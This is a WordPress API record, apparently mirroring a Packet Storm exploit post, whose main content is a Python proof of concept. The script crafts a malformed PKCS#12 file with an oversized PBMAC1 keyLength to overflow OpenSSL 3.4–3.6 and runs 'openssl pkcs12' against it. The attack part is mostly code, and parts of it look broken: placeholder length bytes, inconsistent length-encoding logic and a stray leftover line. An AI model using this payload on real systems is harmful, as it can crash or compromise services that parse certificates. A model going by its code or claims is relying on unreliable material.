{"id":40784,"date":"2026-02-13T12:58:28","date_gmt":"2026-02-13T12:58:28","guid":{"rendered":"http:\/\/localhost\/?p=40784"},"modified":"2026-02-13T12:58:28","modified_gmt":"2026-02-13T12:58:28","slug":"openssl-3x-pkcs12-pbmac1-keylength-buffer-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40784","title":{"rendered":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:06:36&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in PKCS12 files. By crafting a malicious PKCS12 structure with an excessively large&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215529&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-11187&#8243;,&#8221;CVE-2025-15467&#8243;,&#8221;CVE-2025-15468&#8243;,&#8221;CVE-2025-15469&#8243;,&#8221;CVE-2025-66199&#8243;,&#8221;CVE-2025-68160&#8243;,&#8221;CVE-2025-69418&#8243;,&#8221;CVE-2025-69419&#8243;,&#8221;CVE-2025-69420&#8243;,&#8221;CVE-2025-69421&#8243;,&#8221;CVE-2026-22795&#8243;,&#8221;CVE-2026-22796&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow                                                                        |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.openssl-library.org\/                                                                                            |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/214422\/ \\u0026 \\tCVE-2025-11187, CVE-2025-15467, CVE-2025-15468, CVE-2025-15469, CVE-2025-66199, \\n                                                                    CVE-2025-68160, CVE-2025-69418, CVE-2025-69419, CVE-2025-69420, CVE-2025-69421, \\n    \\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\tCVE-2026-22795, CVE-2026-22796\\n    \\n    [+] Summary    :  This Proof of Concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in PKCS#12 files.\\n                      By crafting a malicious PKCS#12 structure with an excessively large keyLength value, the PoC triggers a memory overflow in the MAC processing logic, \\n    \\t\\t\\t\\t  potentially leading to a segmentation fault and, under certain conditions, remote code execution (RCE).\\n                      The exploit works by abusing ASN.1-encoded PBMAC1 parameters, specifically exceeding the expected 64\u2011byte buffer used internally by OpenSSL. \\n    \\t\\t\\t\\t  When the generated malicious.p12 file is parsed using the openssl pkcs12 command, vulnerable versions may crash or hang, indicating successful triggering of the flaw.\\n    \\n    [+] POC :\\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import struct\\n    import os\\n    from hashlib import sha256\\n    \\n    def create_malicious_pkcs12():\\n    \\n        pkcs12_template = bytes([\\n    \\n            0x30, 0x82, 0xFF, 0xFF,  \\n    \\n            0x02, 0x01, 0x03,\\n    \\n            0x30, 0x82, 0xFF, 0xFF,\\n    \\n            0x30, 0x82, 0xFF, 0xFF,\\n            0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x01, \\n            0xA0, 0x82, 0xFF, 0xFF,\\n    \\n            0xA0, 0x82, 0xFF, 0xFF,\\n            0x04, 0x82, 0xFF, 0xFF, \\n        ])\\n    \\n        macdata = bytearray()\\n    \\n        macdata.extend(b&#8217;\\\\x30\\\\x82\\\\xFF\\\\xFF&#8217;)  \\n    \\n        macdata.extend(b&#8217;\\\\x30\\\\x0D&#8217;)\\n        macdata.extend(b&#8217;\\\\x06\\\\x09\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x07\\\\x01&#8242;) \\n        macdata.extend(b&#8217;\\\\x05\\\\x00&#8242;)\\n    \\n        macdata.extend(b&#8217;\\\\x04\\\\x20&#8242;)  \\n        macdata.extend(os.urandom(32))\\n    \\n        macdata.extend(b&#8217;\\\\x02\\\\x04\\\\x00\\\\x00\\\\x27\\\\x10&#8242;)  # 10000 iterations\\n        macdata.extend(b&#8217;\\\\x30\\\\x82\\\\xFF\\\\xFF&#8217;)  \\n    \\n        macdata.extend(b&#8217;\\\\x02\\\\x04&#8242;)  \\n        keylength = 1000 \\n        macdata.extend(struct.pack(&#8216;\\u003eI&#8217;, keylength))\\n        macdata.extend(b&#8217;\\\\x30\\\\x0C&#8217;)\\n        macdata.extend(b&#8217;\\\\x06\\\\x09\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x07\\\\x01&#8242;) \\n        macdata.extend(b&#8217;\\\\x05\\\\x00&#8242;)\\n        output = bytearray(pkcs12_template)\\n        fake_data = b&#8217;\\\\x00&#8242; * 100\\n        output.extend(fake_data)\\n        macdata_pos = len(output)\\n        output.extend(macdata)\\n        def set_length(data, pos, length):\\n            if length \\u003c 128:\\n                data[pos] = 0x80 + 1\\n                data[pos+1] = length\\n                return 2\\n            else:\\n                len_bytes = (length.bit_length() + 7) \/\/ 8\\n                data[pos] = 0x80 + len_bytes + 1\\n                data[pos+1] = 0x80 + len_bytes\\n                for i in range(len_bytes):\\n                    data[pos+2+i] = (length \\u003e\\u003e (8*(len_bytes-1-i))) \\u0026 0xFF\\n                return len_bytes + 2\\n        macdata_len = len(macdata) &#8211; 4  # Minus the SEQUENCE header\\n        len_bytes = set_length(output, macdata_pos + 1, macdata_len)\\n        with open(&#8216;malicious.p12&#8217;, &#8216;wb&#8217;) as f:\\n            f.write(output)\\n        \\n        print(\\&#8221;[+] Created malicious PKCS#12 file: malicious.p12\\&#8221;)\\n        print(f\\&#8221;[+] KeyLength parameter: {keylength} bytes (buffer is 64 bytes)\\&#8221;)\\n        print(\\&#8221;[!] When opened with: openssl pkcs12 -info -in malicious.p12\\&#8221;)\\n    \\n    def test_with_openssl():\\n    \\n        import subprocess\\n        \\n        print(\\&#8221;\\\\n[*] Testing with OpenSSL&#8230;\\&#8221;)\\n        try:\\n            result = subprocess.run(\\n                [&#8216;openssl&#8217;, &#8216;pkcs12&#8217;, &#8216;-info&#8217;, &#8216;-in&#8217;, &#8216;malicious.p12&#8217;, &#8216;-passin&#8217;, &#8216;pass:&#8217;],\\n                capture_output=True,\\n                text=True,\\n                timeout=5\\n            )\\n            print(f\\&#8221;Return code: {result.returncode}\\&#8221;)\\n            if \\&#8221;Segmentation fault\\&#8221; in result.stderr or \\&#8221;buffer overflow\\&#8221; in result.stderr:\\n                print(\\&#8221;[+] Vulnerability triggered!\\&#8221;)\\n            elif result.returncode != 0:\\n                print(f\\&#8221;[!] OpenSSL crashed with: {result.stderr[:200]}\\&#8221;)\\n            else:\\n                print(\\&#8221;[-] No crash &#8211; maybe patched or wrong OpenSSL version\\&#8221;)\\n        except subprocess.TimeoutExpired:\\n            print(\\&#8221;[+] OpenSSL appears to have hung\/crashed\\&#8221;)\\n        except FileNotFoundError:\\n            print(\\&#8221;[-] OpenSSL not found in PATH\\&#8221;)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        print(\\&#8221;=== CVE-2025-11187 PoC &#8211; PKCS#12 PBMAC1 Buffer Overflow ===\\\\n\\&#8221;)\\n        create_malicious_pkcs12()\\n        test_with_openssl()\\n        \\n        print(\\&#8221;\\\\n[*] For manual testing:\\&#8221;)\\n        print(\\&#8221;    $ openssl pkcs12 -info -in malicious.p12 -noout\\&#8221;)\\n        print(\\&#8221;    Expected: segmentation fault or buffer overflow detection\\&#8221;)\\n    \\n    summary en titel\\n    \\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215529&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215529\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:06:36&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40784","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40784\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:06:36&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40784\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-13T12:58:28+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529\",\"datePublished\":\"2026-02-13T12:58:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784\"},\"wordCount\":930,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40784#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784\",\"name\":\"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-13T12:58:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40784\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40784#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40784","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:06:36&#8243;,&#8221;description&#8221;:&#8221;This proof of concept demonstrates a buffer overflow vulnerability in OpenSSL versions 3.4 to 3.6 related to improper handling of the PBMAC1 keyLength parameter in...","og_url":"https:\/\/zero.redgem.net\/?p=40784","og_site_name":"zero redgem","article_published_time":"2026-02-13T12:58:28+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40784#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40784"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529","datePublished":"2026-02-13T12:58:28+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40784"},"wordCount":930,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40784#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40784","url":"https:\/\/zero.redgem.net\/?p=40784","name":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-13T12:58:28+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40784#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40784"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40784#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSSL 3.x PKCS#12 PBMAC1 KeyLength Buffer Overflow_PACKETSTORM:215529"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40784"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40784\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}